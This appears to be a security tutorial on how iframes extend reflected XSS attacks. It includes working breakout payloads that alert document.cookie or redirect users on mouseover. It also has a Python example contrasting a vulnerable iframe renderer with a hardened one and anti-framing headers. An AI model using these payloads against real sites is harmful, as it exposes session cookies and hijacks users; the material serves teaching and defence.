The IFRAME element can be a security risk if any page on your site contains an exploitable XSS vulnerability.
If so, the attacker can extend the XSS attack to any page on the same domain that can be persuaded to load within an
<iframe>
on the page with the XSS vulnerability.
This is because content from the same origin (same domain) is allowed to access the parent document's DOM (in practice, to execute JavaScript in the "host" document). The only real protections against this attack are to add the HTTP header
X-Frame-Options: DENY
and/or to always correctly encode all user-submitted data (that is, never have an XSS vulnerability on your site, which is easier said than done).
Below we look at a few examples of IFRAMEs and how they can be combined with XSS to display different information.
You can view a video of all the examples below here - https://youtu.be/t5jdgj8ihwY
Stage 1 - Load the cookie of the existing user
Here we use the following payload to display the current user's session cookie, reflected back into the page, because the server has a reflected XSS vulnerability.
<IFRAME width="420" height="315" frameborder=0 onload="alert(document.cookie)"></IFRAME>&ParamHeight=250
Or using Script Tags
"></iframe><script>alert(document.cookie);</script>
Stage 2 - Loading any text from the URL into the browser via reflected XSS
></iframe><script>alert(`THIS IS A BACKTICK`);</script><iframe frameborder="0%EF%BB%BF&ParamHeight=250
Stage 3 - Using the 'mouseover' event
Here we use the 'mouseover' event handler to redirect the user to a custom-defined website as soon as the cursor moves into the iframe area.
You can view an example of this here - https://youtu.be/t5jdgj8ihwY
<IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg'"></IFRAME>&ParamHeight=250
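The stages above all depend on a server reflecting a URL parameter (ParamHeight) straight into the iframe markup, and the opening paragraph names the two defences: an anti-framing header and correct output encoding. The following is an added example, not code from the original post, showing both in Python: a hypothetical server-side render function in a deliberately vulnerable form beside a hardened form, the Stage 1 breakout payload from this page as the constructed test input, and the response headers (X-Frame-Options, plus its CSP successor frame-ancestors) that stop the page being framed. The embed URL and function names are assumptions for illustration.

```python
import html
import re

# Response headers that stop this page being framed by any other page,
# including a same-site page that carries an XSS bug. X-Frame-Options is
# the header the article names; Content-Security-Policy frame-ancestors
# is its standardised successor, and sending both covers older browsers.
def anti_framing_headers():
    return {
        "X-Frame-Options": "DENY",
        "Content-Security-Policy": "frame-ancestors 'none'",
    }

# Vulnerable rendering (hypothetical), mirroring the reflected ParamHeight
# parameter seen in the article's payloads: the raw value is pasted into
# the height attribute, so a quote in it closes the attribute and the tag.
def render_iframe_unsafe(src, param_height):
    return (f'<iframe width="420" height="{param_height}" frameborder="0" '
            f'src="{src}"></iframe>')

# Hardened rendering: the height must be a whole number of pixels (anything
# else falls back to a default), and the URL is attribute-encoded so that
# quotes and angle brackets become entities instead of markup.
_PIXELS = re.compile(r"[0-9]{1,4}")

def render_iframe_safe(src, param_height, default_height="315"):
    height = param_height if _PIXELS.fullmatch(param_height) else default_height
    safe_src = html.escape(src, quote=True)
    return (f'<iframe width="420" height="{height}" frameborder="0" '
            f'src="{safe_src}"></iframe>')

# Structural check: a single iframe element contains exactly two "<"
# characters, so any more means the input broke out of the tag.
def tag_count(markup):
    return markup.count("<")

# Constructed sample inputs; BREAKOUT is the Stage 1 payload from the article.
SAFE_HEIGHT = "250"
BREAKOUT = '"></iframe><script>alert(document.cookie);</script>'

if __name__ == "__main__":
    # Assumed embed URL, used only for illustration.
    print(render_iframe_unsafe("https://example.invalid/embed", BREAKOUT))
    print(render_iframe_safe("https://example.invalid/embed", BREAKOUT))
    print(anti_framing_headers())
```

The hardened version combines an allow-list (the height can only be digits) with context-correct encoding of the URL; the headers are returned as a plain dictionary so they can be attached to whatever response object the framework uses.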